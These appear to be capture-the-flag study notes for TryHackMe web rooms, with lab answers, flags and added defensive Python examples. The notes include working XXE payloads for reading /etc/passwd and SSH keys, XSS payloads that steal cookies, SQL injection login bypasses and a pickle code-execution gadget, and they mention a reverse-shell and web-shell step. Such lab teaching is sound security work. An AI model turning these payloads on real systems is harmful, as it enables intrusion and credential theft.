Web Hacking Fundamentals

Table of contents

  • Web Hacking Fundamentals
    • Web Fundamentals
      • task1 Introduction and objectives
      • task2 How do we load websites?
      • task3 More HTTP - Verbs and request formats
      • task4 Cookies, tasty!
      • task5 Mini CTF
    • OWASP Top 10
      • task1 Introduction
      • task2 Accessing machines
      • task3 [Severity 1] Injection
      • task4 [Severity 1] OS Command Injection
      • task5 [Severity 1] Command Injection Practical
      • task6 [Severity 2] Broken Authentication
      • task7 [Severity 2] Broken Authentication Practical
      • task8 [Severity 3] Sensitive Data Exposure (Introduction)
      • task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)
      • task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)
      • task11 [Severity 3] Sensitive Data Exposure (Challenge)
      • task12 [Severity 4] XML External Entity
      • task13 [Severity 4] XML External Entity - eXtensible Markup Language
      • task14 [Severity 4] XML External Entity - DTD
      • task15 [Severity 4] XML External Entity - XXE Payload
      • task16 [Severity 4] XML External Entity - Exploiting
      • task17 [Severity 5] Broken Access Control
      • task18 [Severity 5] Broken Access Control (IDOR Challenge)
      • task19 [Severity 6] Security Misconfiguration
      • task20 [Severity 7] Cross-site Scripting
      • task21 [Severity 8] Insecure Deserialization
      • task22 [Severity 8] Insecure Deserialization - Objects
      • task23 [Severity 8] Insecure Deserialization - Deserialization
      • task24 [Severity 8] Insecure Deserialization - Cookies
      • task25 [Severity 8] Insecure Deserialization - Cookies Practical
      • task26 [Severity 8] Insecure Deserialization - Code Execution
      • task27 [Severity 9] Components With Known Vulnerabilities - Intro
      • task28 [Severity 9] Components With Known Vulnerabilities - Exploit
      • task29 [Severity 9] Components With Known Vulnerabilities - Lab
      • task30 [Severity 10] Insufficient Logging and Monitoring
      • task31 What Next?
    • OWASP Juice Shop
      • task1 Open for business!
      • task2 Let's go on an adventure!
      • task 3 Inject the juice
      • task 4 Who broke my lock?!
      • task 5 AH! Don't look!
      • task6 Who's flying this thing?
      • task 7 Where did that come from?
      • task 8 Exploration!
    • Pickle Rick
      • Task1 Pickle Rick

Web Fundamentals

task1 Introduction and objectives

1.Read and understand the information

task2 How do we load websites?

1.What request verb is used to retrieve page content?

GET

2.What port do web servers normally listen on?

80

3.What’s responsible for making websites look fancy?

CSS

The actual content of a web page is usually a combination of HTML, CSS and JavaScript. HTML defines the structure and content of the page. CSS lets you change how the page looks, which is what makes it "fancy". JavaScript is a programming language that runs in the browser and lets you make the page interactive or load extra content.

task3 More HTTP - Verbs and request formats

1.What verb would be used for a login?

POST

2.What verb would be used to see your bank balance once you’re logged in?

GET

3.Does the body of a GET request matter? Yea/Nay

Nay

4.What’s the status code for “I’m a teapot”?

418

RFC 2324, the Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0), is a joke RFC the IETF published on April Fools' Day 1998.
In HTCPCP/1.0, status code 418 is what a teapot returns when a client asks it to brew coffee: "I'm a teapot".

5.What status code will you get if you need to authenticate to access some content, and you’re unauthenticated?

401

task4 Cookies, tasty!

1.Read and try to understand this information. Check out the link for extra information.

task5 Mini CTF

1.What’s the GET flag?

thm{162520bec925bd7979e9ae65a725f99f}

curl http://10.10.103.59:8081/ctf/get

2.What’s the POST flag?

thm{3517c902e22def9c6e09b99a9040ba09}

curl -d flag_please http://10.10.103.59:8081/ctf/post

3.What’s the “Get a cookie” flag?

thm{91b1ac2606f36b935f465558213d7ebd}

Visit http://10.10.103.59:8081/ctf/getcookie in Firefox and look at the cookie it sets in the browser's cookie storage.

4.What’s the “Set a cookie” flag?

thm{c10b5cb7546f359d19c747db2d0f47b3}

Edit the cookie for the domain 10.10.103.59 so that both its name and its value are flagpls, then visit http://10.10.103.59:8081/ctf/sendcookie;

Alternatively, in the previous question save the cookie with curl -c cookie.txt http://10.10.103.59:8081/ctf/getcookie, edit the cookie name and value in cookie.txt to flagpls, then send it back with curl -b cookie.txt http://10.10.103.59:8081/ctf/sendcookie to get the flag.

OWASP Top 10

task1 Introduction

  • Injection
  • Broken Authentication
  • Sensitive Data Exposure
  • XML External Entity
  • Broken Access Control
  • Security Misconfiguration
  • Cross-site Scripting
  • Insecure Deserialization
  • Components with Known Vulnerabilities
  • Insufficient Logging & Monitoring

task2 Accessing machines

Connect to our network or deploy the AttackBox.

task3 [Severity 1] Injection

I’ve understood Injection attacks.

task4 [Severity 1] OS Command Injection

I’ve understood command injection.

task5 [Severity 1] Command Injection Practical

1.What strange text file is in the website root directory?

drpepper.txt

2.How many non-root/non-service/non-daemon users are there?

0

3.What user is this app running as?

www-data

4.What is the user’s shell set as?

/usr/sbin/nologin

5.What version of Ubuntu is running?

18.04.4

6.Print out the MOTD. What favorite beverage is shown?

DR PEPPER

00-header refers to /etc/update-motd.d/00-header, the script that generates the header of the Ubuntu SSH login message (MOTD).

task6 [Severity 2] Broken Authentication

1.I’ve understood broken authentication mechanisms.

task7 [Severity 2] Broken Authentication Practical

1.What is the flag that you found in darren’s account?

fe86079416a21a3c99937fea8874b667

Registration treats "darren" and " darren" (with a leading space) as two different usernames, but login resolves them to the same account: a logic flaw that hands you darren's account.

2.Now try to do the same trick and see if you can login as arthur.

3.What is the flag that you found in arthur’s account?

d9ac0f7db4fda460ac3edeb75d75e16e
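To make the logic flaw concrete, here is an added example (not the room's application code) of a registration and login pair with the same bug, next to the corrected version. The user store, the passwords and the canonical() normalisation are assumptions; the flag value is the one from question 1.

```python
import hmac

# Constructed in-memory user store standing in for the lab's database
# (added example, not the room's application). Plaintext passwords keep the
# example short; the bug is the username handling, not password storage.
USERS = {
    "darren": {"password": "correct-horse", "flag": "fe86079416a21a3c99937fea8874b667"},
}


def canonical(username: str) -> str:
    """One normalisation, used for every lookup in the fixed version."""
    return username.strip().lower()


def register(users: dict, username: str, password: str, normalise: bool) -> bool:
    """normalise=False is the lab's behaviour: uniqueness is checked on the raw
    string, so ' darren' is accepted as a brand-new account.
    normalise=True is the fix: ' darren' collides with 'darren' and is rejected."""
    key = canonical(username) if normalise else username
    if key in users:
        return False
    users[key] = {"password": password, "flag": None}
    return True


def login_vulnerable(users: dict, username: str, password: str):
    """Authenticates against the exact record that was registered, then loads
    the profile with a trimmed username: the attacker's own password opens
    darren's profile."""
    account = users.get(username)
    if account is None or not hmac.compare_digest(account["password"], password):
        return None
    return users.get(username.strip())  # the bug: a different key than above


def login_fixed(users: dict, username: str, password: str):
    """Same canonical key for authentication and profile, so there is one darren."""
    key = canonical(username)
    account = users.get(key)
    if account is None or not hmac.compare_digest(account["password"], password):
        return None
    return account


def demo():
    """Returns (flag stolen via the bug, registration blocked after the fix,
    result of the same login attempt after the fix)."""
    vulnerable = {k: dict(v) for k, v in USERS.items()}
    fixed = {k: dict(v) for k, v in USERS.items()}
    register(vulnerable, " darren", "attacker-pw", normalise=False)  # accepted
    stolen = login_vulnerable(vulnerable, " darren", "attacker-pw")
    blocked = not register(fixed, " darren", "attacker-pw", normalise=True)
    return stolen["flag"], blocked, login_fixed(fixed, " darren", "attacker-pw")
```

The general rule: normalise identifiers once, at the boundary, and use that canonical form for every uniqueness check and lookup afterwards. Two code paths that disagree about what "the same username" means is exactly what this room exploits.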

task8 [Severity 3] Sensitive Data Exposure (Introduction)

Read the introduction to Sensitive Data Exposure and deploy the machine.

task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)

Read and understand the supporting material on SQLite Databases.

task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)

Read the supporting material about cracking hashes.

task11 [Severity 3] Sensitive Data Exposure (Challenge)

1.What is the name of the mentioned directory?

/assets

2.Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db

3.Use the supporting material to access the sensitive data. What is the password hash of the admin user?

6eea9b7ef19179a06954edd0f6c05ceb

4.What is the admin’s plaintext password?

qwertyuiop

The MD5 hash was reversed with an online MD5 lookup/cracking service.

5.Login as the admin. What is the flag?

THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
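As an added illustration (not the lab's file or scripts), this builds a stand-in copy of webapp.db with a users table, dumps it the way the sqlite3 CLI from the supporting material would, and runs an offline dictionary attack on the unsalted MD5 instead of an online lookup. The table layout, the second user and the wordlist are constructed; the admin hash is computed from the plaintext recovered in question 4.

```python
import hashlib
import os
import sqlite3
import tempfile

# Constructed wordlist; a real run would use rockyou.txt or similar.
WORDLIST = ["123456", "password", "qwerty", "qwertyuiop", "letmein"]


def build_exposed_db(path: str) -> None:
    """Constructed stand-in for the exposed /assets/webapp.db (added example,
    not the lab's file). The admin row is MD5('qwertyuiop'), which is the hash
    found in question 3."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE users (userID TEXT, username TEXT, password TEXT, admin INTEGER)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            ("1", "admin", hashlib.md5(b"qwertyuiop").hexdigest(), 1),
            ("2", "Bob", hashlib.md5(b"bob-has-a-long-passphrase").hexdigest(), 0),
        ],
    )
    con.commit()
    con.close()


def dump_users(path: str):
    """Python equivalent of `.tables`, `PRAGMA table_info(users)` and
    `SELECT * FROM users` in the sqlite3 CLI: returns (username, hash) pairs."""
    con = sqlite3.connect(path)
    columns = [row[1] for row in con.execute("PRAGMA table_info(users)")]
    if not {"username", "password"} <= set(columns):
        raise ValueError("unexpected schema: %r" % columns)
    rows = con.execute("SELECT username, password FROM users").fetchall()
    con.close()
    return rows


def crack_md5(target_hex: str, wordlist):
    """Offline dictionary attack. Unsalted MD5 is a fixed function of the
    password, so one hash per candidate word is all it takes; returns the
    matching word or None."""
    target = target_hex.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def demo():
    """Returns {username: cracked password or None} for the stand-in database."""
    with tempfile.TemporaryDirectory() as tmp:
        db = os.path.join(tmp, "webapp.db")
        build_exposed_db(db)
        return {user: crack_md5(digest, WORDLIST) for user, digest in dump_users(db)}
```

The defensive lesson is in the two halves: the database should never be reachable under the web root, and even if it leaks, a salted, slow password hash (bcrypt, scrypt, Argon2) makes the second half expensive instead of instant.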

task12 [Severity 4] XML External Entity

Deploy the machine attached to the task.

task13 [Severity 4] XML External Entity - eXtensible Markup Language

1.Full form of XML

eXtensible Markup Language

XML stands for eXtensible Markup Language.

2.Is it compulsory to have XML prolog in XML documents?

no

3.Can we validate XML documents against a schema?

yes

4.How can we specify XML version and encoding in XML document?

XML Prolog

task14 [Severity 4] XML External Entity - DTD

1.How do you define a new ELEMENT?

!ELEMENT

2.How do you define a ROOT element?

!DOCTYPE

3.How do you define a new ENTITY?

!ENTITY

!ELEMENT defines a new element; !DOCTYPE defines the root element; !ENTITY defines a new entity.

task15 [Severity 4] XML External Entity - XXE Payload

1.Try the payload mentioned in description on the website.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

task16 [Severity 4] XML External Entity - Exploiting

1.Try to display your own name using any payload.

2.See if you can read the /etc/passwd

3.What is the name of the user in /etc/passwd

falcon

4.Where is falcon’s SSH key located?

/home/falcon/.ssh/id_rsa

5.What are the first 18 characters for falcon’s private key

MIIEogIBAAKCAQEA7b
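Added example, not part of the room: the task 15 payload parsed by Python's xml.sax with external general entities enabled (the vulnerable setting, which is what the lab's parser does) and disabled (Python's default since 3.7.1). The target is a temporary file standing in for /home/falcon/.ssh/id_rsa, with constructed contents; everything else is the payload exactly as used in task 15 and 16.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, like an app that echoes the parsed value back."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted_xml(payload: bytes, resolve_external: bool) -> str:
    """resolve_external=True is the vulnerable configuration: the parser fetches
    SYSTEM entities and splices the file contents into the document, so whatever
    the app displays from the XML now carries the file."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return "".join(handler.parts)


def xxe_payload(target_url: str) -> bytes:
    """The task 15 payload with the target made a parameter
    (file:///etc/passwd, file:///home/falcon/.ssh/id_rsa, ...)."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE root [<!ENTITY read SYSTEM '{target_url}'>]>\n"
        "<root>&read;</root>"
    ).encode()


def demo():
    """Returns (text seen by the app with external entities on, same with them off)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "id_rsa")
        with open(secret, "w") as fh:
            # constructed stand-in for the private key, not falcon's real key
            fh.write("-----BEGIN RSA PRIVATE KEY-----MIIEogIBAAKCAQEA7b")
        payload = xxe_payload("file://" + secret)
        leaked = parse_untrusted_xml(payload, resolve_external=True)
        safe = parse_untrusted_xml(payload, resolve_external=False)
    return leaked, safe
```

The fix is the one-line difference between the two calls: never let a parser that handles user-supplied XML resolve external entities (and, for parsers that process them, disable DTDs altogether). The exploit in task 16 is the same payload with the target swapped for falcon's key path.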

task17 [Severity 5] Broken Access Control

Read and understand how broken access control works.

task18 [Severity 5] Broken Access Control (IDOR Challenge)

1.Read and understand how IDOR works.

2.Deploy the machine and go to http://MACHINE_IP - Login with the username being noot and the password test1234.

3.Look at other users notes. What is the flag?

flag{fivefourthree}

task19 [Severity 6] Security Misconfiguration

1.Deploy the VM

2.Hack into the webapp, and find the flag!

thm{4b9513968fd564a87b28aa1f9d672e17}

(https://github.com/NinjaJc01/PensiveNotes)

task20 [Severity 7] Cross-site Scripting

1.Deploy the VM

2.Navigate to http://10.10.131.49/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

ThereIsMoreToXSSThanYouThink

3.On the same reflected XSS page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

ReflectiveXss4TheWin

<script>alert(window.location.hostname)</script>

4.Now navigate to http://10.10.131.49/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.

Then add a comment and see if you can insert some of your own HTML.

HTML_T4gs

5.On the same page, create an alert popup box appear on the page with your document cookies.

W3LL_D0N3_LVL2

<script>alert(document.cookie)</script>

6.Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

websites_can_be_easily_defaced_with_xss

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

task21 [Severity 8] Insecure Deserialization

1.Who developed the Tomcat application?

Apache Software Foundation

2.What type of attack that crashes services can be performed with insecure deserialization?

Denial of Service

Insecure deserialization can lead to denial of service (DoS) and remote code execution (RCE).

task22 [Severity 8] Insecure Deserialization - Objects

If a dog was sleeping, would this be:

A) A State
B) A Behaviour

A Behaviour

task23 [Severity 8] Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

binary

task24 [Severity 8] Insecure Deserialization - Cookies

1.If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

webapp.com/login

2.What is the acronym for the web technology that Secure cookies work over?

https

The Secure attribute means the cookie is only sent over HTTPS connections; HttpOnly stops JavaScript from reading the cookie.

task25 [Severity 8] Insecure Deserialization - Cookies Practical

1.1st flag (cookie value)

THM{good_old_base64_huh}

2.2nd flag (admin dashboard)

THM{heres_the_admin_flag}

task26 [Severity 8] Insecure Deserialization - Code Execution

flag.txt

Run the Python script from GitHub (after modifying it for your IP and port) to obtain the base64-encoded reverse-shell payload, put it in the encodepayload cookie and send the request.

4a69a7ff9fd68
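To show what a base64-encoded serialised cookie gives an attacker, here is an added example (not the room's application or the GitHub script). It assumes the cookie is a base64-encoded Python pickle (the page only says base64, so the format is an assumption); the gadget runs a harmless shell command that writes a marker file where the room's payload starts a reverse shell. The HMAC-signed JSON cookie beside it is the fix: the server never deserialises attacker-controlled object graphs and rejects any cookie that has been edited.

```python
import base64
import hashlib
import hmac
import json
import os
import pickle
import tempfile


class Exploit:
    """Gadget: unpickling an instance calls os.system(cmd) before the
    application ever sees an object."""

    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def encode_cookie_vulnerable(obj) -> str:
    """Base64-wrapped pickle, the pattern behind THM{good_old_base64_huh}."""
    return base64.b64encode(pickle.dumps(obj)).decode()


def decode_cookie_vulnerable(cookie: str):
    """pickle.loads on attacker-controlled bytes is the bug."""
    return pickle.loads(base64.b64decode(cookie))


def encode_cookie_safe(data: dict, key: bytes) -> str:
    """Plain data (JSON) plus an HMAC over it: no object reconstruction, and
    any tampering (e.g. flipping admin to true) breaks the tag."""
    body = base64.urlsafe_b64encode(json.dumps(data, separators=(",", ":")).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def decode_cookie_safe(cookie: str, key: bytes) -> dict:
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cookie signature invalid")
    return json.loads(base64.urlsafe_b64decode(body))


def demo():
    """Returns (code ran during vulnerable decode, tampered safe cookie rejected,
    content of an untampered safe cookie)."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "pwned")
        cookie = encode_cookie_vulnerable(Exploit(f"echo pwned > {marker}"))
        decode_cookie_vulnerable(cookie)          # the app just wanted a session
        rce = os.path.exists(marker)
    key = os.urandom(32)                          # server-side secret, assumption
    good = encode_cookie_safe({"user": "noot", "admin": False}, key)
    forged_body = base64.urlsafe_b64encode(b'{"user":"noot","admin":true}').decode()
    forged = forged_body + "." + good.rpartition(".")[2]
    try:
        decode_cookie_safe(forged, key)
        rejected = False
    except ValueError:
        rejected = True
    return rce, rejected, decode_cookie_safe(good, key)
```

Note that the safe variant still stores nothing secret in the cookie; if the session must carry private data, encrypt it as well, and mark the cookie Secure and HttpOnly as task 24 describes.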

task27 [Severity 9] Components With Known Vulnerabilities - Intro

Read above.

task28 [Severity 9] Components With Known Vulnerabilities - Exploit

Read the above!

task29 [Severity 9] Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Click Admin Login at the bottom right of the home page to reach the login form; the SQL injection payload %' or '1'='1 logs you into the backend. The "add book" feature in the backend has an arbitrary file upload vulnerability, so upload a small web shell, go back to the site, open the newly added book and the reverse shell connects back.

1611

task30 [Severity 10] Insufficient Logging and Monitoring

1.What IP address is the attacker using?

49.99.13.16

2.What kind of attack is being carried out?

Brute force
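Added example, not the room's log or tooling: a sliding-window detector for the brute force in this task. The log lines are constructed in the same shape as the task's sample (status, reason, source IP, timestamp, path) with the attacker IP from question 1; that field layout and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines (not the task's actual log). One normal login, one
# user who mistypes once, and the attacker hammering /login.
SAMPLE_LOG = """\
200 OK           200.10.1.2    2019-03-12T14:20:01 /login
401 Unauthorized 10.23.1.5     2019-03-12T14:20:30 /login
200 OK           10.23.1.5     2019-03-12T14:20:41 /login
401 Unauthorized 49.99.13.16   2019-03-12T14:21:44 /login
401 Unauthorized 49.99.13.16   2019-03-12T14:21:45 /login
401 Unauthorized 49.99.13.16   2019-03-12T14:21:46 /login
401 Unauthorized 49.99.13.16   2019-03-12T14:21:47 /login
401 Unauthorized 49.99.13.16   2019-03-12T14:21:48 /login
401 Unauthorized 49.99.13.16   2019-03-12T14:21:49 /login
"""

LOG_LINE = re.compile(
    r"^(?P<status>\d{3})\s+(?P<reason>.+?)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<ts>\S+)\s+(?P<path>\S+)$"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Counts failed logins per source IP inside a sliding time window.
    Returns {ip: highest number of failures seen in one window} for every IP
    that reached the threshold; one bad password never trips it."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["path"] != "/login" or m["status"] != "401":
            continue
        ts = datetime.fromisoformat(m["ts"])
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:          # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[m["ip"]] = max(alerts.get(m["ip"], 0), len(q))
    return alerts


def demo():
    return detect_bruteforce(SAMPLE_LOG.splitlines())
```

The point of the task is that none of this is possible if the 401s are never written down with a source address and a timestamp; the detector is cheap, the missing log is not recoverable.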

task31 What Next?

Read the above!

OWASP Juice Shop

task1 Open for business!

1.Deploy the VM attached to this task to get started! You can access this machine by using your browser-based machine, or if you’re connected through OpenVPN.

2.Once the machine has loaded, access it by copying and pasting its IP into your browser; if you’re using the browser-based machine, paste the machines IP into a browser on that machine.

task2 Let’s go on an adventure!

1.Question #1: What’s the Administrator’s email address?

The reviews show each user’s email address. Which, by clicking on the Apple Juice product, shows us the Admin email!

admin@juice-sh.op

2.The search parameter, visible after /#/search? in the URL, is the letter q

q

3.Googling "replicator" shows that it comes from the TV show Star Trek

Star Trek

tsak 3 Inject the juice

1.Question #1: Log into the administrator account!

32a5e0f21372bcc1000a6088b93b458e41f0e02a

Log in with a SQL injection authentication bypass; payload: 1' or '1'='1'--

2.Question #2: Log into the Bender account!

fb364762a3c102b2db932069c0e6b78e738d4066

The same SQL injection, this time naming the account; payload: bender@juice-sh.op'--
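Both payloads above, and the %' or '1'='1 bypass in the [Severity 9] lab, work the same way. This added example (not Juice Shop's code) shows a string-built login query falling to them and the parameterised version that does not. The Users table and its rows are constructed; Juice Shop stores hashed passwords, which does not change the bug.

```python
import sqlite3

PAYLOAD_ANY_USER = "1' or '1'='1'--"        # task 3, question 1: first row wins
PAYLOAD_BENDER = "bender@juice-sh.op'--"     # task 3, question 2: pick the account


def make_db():
    """Constructed stand-in for the shop's Users table (added example)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)")
    con.executemany(
        "INSERT INTO Users (email, password, role) VALUES (?, ?, ?)",
        [
            ("admin@juice-sh.op", "admin123", "admin"),
            ("bender@juice-sh.op", "unknown-to-the-attacker", "customer"),
        ],
    )
    return con


def login_vulnerable(con, email: str, password: str):
    """String-built query. The quote in the input closes the literal, the OR
    makes the WHERE true for every row, and everything after -- is a comment,
    so the password check disappears. Returns the first matching (email, role)."""
    query = (
        "SELECT email, role FROM Users "
        f"WHERE email = '{email}' AND password = '{password}'"
    )
    return con.execute(query).fetchone()


def login_fixed(con, email: str, password: str):
    """Parameterised query: the values travel separately from the SQL text,
    so the same payloads are just strings that match no row."""
    return con.execute(
        "SELECT email, role FROM Users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
```

Printing the query that login_vulnerable builds for PAYLOAD_BENDER shows why ordering matters: the account is selected by the attacker-controlled email and the password clause is commented out, which is exactly what logs you in as Bender without knowing his password.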

task 4 Who broke my lock?!

1.Question #1: Bruteforce the Administrator account’s password!

c2110d06dc6f81c67cd8099ff0ba601241f1ac0e

Brute-forcing the admin@juice-sh.op account gives the password admin123.

2.Question #2: Reset Jim’s password!

094fbc9b48e525150ba97d05b942bbf114987257

The security question is the eldest sibling's middle name. Jim, as the previous question's Star Trek reference suggests, is James Kirk, whose brother is George Samuel Kirk, so the answer is the middle name Samuel.

task 5 AH! Don’t look!

1.Question #1: Access the Confidential Document!

edf9281222395a1c5fee9b89e32175f1ccf50c5b

The "About Us" link points to http://10.10.164.205/ftp/legal.md; browsing the /ftp directory itself lists many files, including the confidential document.

2.Question #2: Log into MC SafeSearch’s account!

Searching for MC SafeSearch finds a YouTube video in which he says his password is "Mr. Noodles" but with the "vowels into zeros", so the password is Mr.N00dles.

3.Question #3: Download the Backup file!

Downloading package.json.bak from the /ftp directory fails with an error saying only .md and .pdf files may be downloaded; a %00 null-byte truncation before an allowed extension bypasses the check and downloads the file.

task6 Who’s flying this thing?

1.Question #1: Access the administration page!

946a799363226a24822008503f5d1324536629a0

Requesting the administration page directly returns 403; you have to be logged in as the administrator to access it.

2.Question #2: View another user’s shopping basket!

41b997a36cc33fbe4f0ba018474e19ae5ce52121

Intercept the basket request with Burp: the URL http://10.10.164.205/rest/basket/1 ends in the user's basket ID (1). Changing it to another user's ID returns their basket, a horizontal privilege escalation (IDOR).
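Added example (not Juice Shop's code, nor the notes app from task 18) of the IDOR in /rest/basket/<id> and in task 18's notes: a lookup keyed only on the URL ID, the ownership check that fixes it, and the ID walking an attacker does in Burp Repeater or Intruder. The basket data and user names are constructed.

```python
# Constructed baskets keyed by the numeric ID that appears in /rest/basket/<id>
# (added example; not Juice Shop's data).
BASKETS = {
    1: {"owner": "admin@juice-sh.op", "items": ["Apple Juice"]},
    2: {"owner": "jim@juice-sh.op", "items": ["Banana Juice"]},
    3: {"owner": "noot", "items": ["Green Smoothie"]},
}


def get_basket_vulnerable(basket_id: int, session_user: str):
    """The ID from the URL is the only key; the session is never consulted,
    so any logged-in user can read any basket."""
    return BASKETS.get(basket_id)


def get_basket_fixed(basket_id: int, session_user: str):
    """Authorisation on the server side: the record must belong to the
    session's user. Returning None for both 'missing' and 'not yours' avoids
    confirming to the attacker which IDs exist."""
    basket = BASKETS.get(basket_id)
    if basket is None or basket["owner"] != session_user:
        return None
    return basket


def enumerate_ids(fetch, session_user: str, id_range):
    """What the attacker does with Burp: walk the ID space and keep every ID
    that comes back with data."""
    return [i for i in id_range if fetch(i, session_user) is not None]
```

Sequential integer IDs make the enumeration trivial, but random IDs are not the fix; the ownership check is, and it must live in the handler that serves the object, not in the client that builds the URL.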

3.Question #3: Remove all 5-star reviews!

50c97bcce0b895e446d61c83a21df371ac2266ef

Log into the administration page and delete the 5-star reviews listed on the right-hand side.

task 7 Where did that come from?

1.Question #1: Perform a DOM XSS!

9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf

Enter the payload <iframe src="javascript:alert(`xss`)"> in the search box.

2.Question #2: Perform a persistent XSS!

149aa8ce13d7a4a8a931472308e269c94dc5f156

The True-Client-IP request header is not sanitised, so an XSS payload sent in that header is stored and rendered later.

3.Question #3: Perform a reflected XSS!

23cefee1527bde039295b2616eeb29e1edc660a0

In the URL http://10.10.164.205/#/track-result?id=5267-d156f507ae884e75 the id parameter is reflected into the page without filtering; replace the id value with a payload and request it to get the popup (Firefox recommended).
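Added example (not the room's or Juice Shop's code) of the server-side fix for the reflected and stored cases in [Severity 7] task 20 and in this task: the same untrusted value rendered in text, attribute and URL contexts. Escaping stops the <script> payloads; the javascript: iframe source needs a scheme allow-list, which escaping alone does not give. The page structure and function names are assumptions.

```python
import html
from urllib.parse import urlparse

SAFE_URL_SCHEMES = {"http", "https"}


def render_text(untrusted: str) -> str:
    """Text-node context: escaping < > & is enough."""
    return html.escape(untrusted, quote=False)


def render_attr(untrusted: str) -> str:
    """Quoted-attribute context: quotes must be escaped too, or the input
    breaks out of the attribute and adds an onmouseover= of its own."""
    return html.escape(untrusted, quote=True)


def render_url(untrusted: str) -> str:
    """URL-attribute context (href/src). A javascript: URL contains no HTML
    metacharacters, so escaping leaves it intact; allow-list the scheme."""
    # browsers ignore tabs and newlines inside the scheme, so strip them first
    candidate = "".join(ch for ch in untrusted if ch not in "\t\n\r").strip()
    scheme = urlparse(candidate).scheme.lower()
    relative = candidate.startswith("/") and not candidate.startswith("//")
    if scheme in SAFE_URL_SCHEMES or relative:
        return html.escape(candidate, quote=True)
    return "about:blank"


def track_result_page_unsafe(order_id: str) -> str:
    """The id parameter goes straight into the markup: reflected XSS."""
    return f"<h1>Order {order_id}</h1>"


def track_result_page_safe(order_id: str, link: str) -> str:
    """Every insertion point uses the encoder for its own context."""
    return (
        f"<h1>Order {render_text(order_id)}</h1>"
        f'<a href="{render_url(link)}" title="{render_attr(order_id)}">details</a>'
    )
```

The stored case (the True-Client-IP header) differs only in where the value comes from: request headers are as untrusted as query parameters, and the encoder is chosen by where the value is written, not by where it was read.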

task 8 Exploration!

Access the /#/score-board/ page

7efd3174f9dd5baa03a7882027f2824d2f72d86e

/score-board is the scoreboard page.

Reference: Juice-Shop practice range study notes (Chinese write-up).

Pickle Rick

Task1 Pickle Rick

1.What is the first ingredient Rick needs?

Look at the page source: a comment reveals the username R1ckRul3s.

Directory enumeration of the site finds login.php and robots.txt; robots.txt contains Wubbalubbadubdub, which is presumably the password.

After logging in there is a command execution page. whoami shows the account is www-data; ls -a lists the files in the directory, and Sup3rS3cretPickl3Ingred.txt gives the first ingredient: mr. meeseek hair

2.Whats the second ingredient Rick needs?

Use the ; separator on the Commands page to run several commands at once. cat is blocked, so use less instead; the file "second ingredients" is in /home/rick.

jerry tear

3.Whats the final ingredient Rick needs?

Running sudo -l shows that the command box can run sudo without a password. sudo ls /root lists 3rd.txt in the root directory, and reading that file gives the third ingredient.

fleeb juice
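The command injection used in [Severity 1] task 5 and on this box works because user input is concatenated into a shell command line. Added example (not the box's own code): the vulnerable form, the shlex.quote fallback for when a shell is unavoidable, and the no-shell, allow-listed version. echo stands in for the box's command, and the hostname allow-list is an assumption about what the input was supposed to be.

```python
import re
import shlex
import subprocess

# Assumption: the page expected a host to ping, so this is what valid input looks like.
HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

INJECTION = "10.10.10.10; echo INJECTED"   # ';' ends the intended command


def run_vulnerable(user_input: str) -> str:
    """shell=True hands the whole string to /bin/sh, so ';' (or &&, |, $(...))
    ends the intended command and starts the attacker's."""
    result = subprocess.run(f"echo {user_input}", shell=True, capture_output=True, text=True)
    return result.stdout


def run_quoted(user_input: str) -> str:
    """If a shell really is needed, shlex.quote turns the input into a single
    literal word, so the metacharacters reach echo as data."""
    result = subprocess.run(f"echo {shlex.quote(user_input)}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def run_fixed(user_input: str) -> str:
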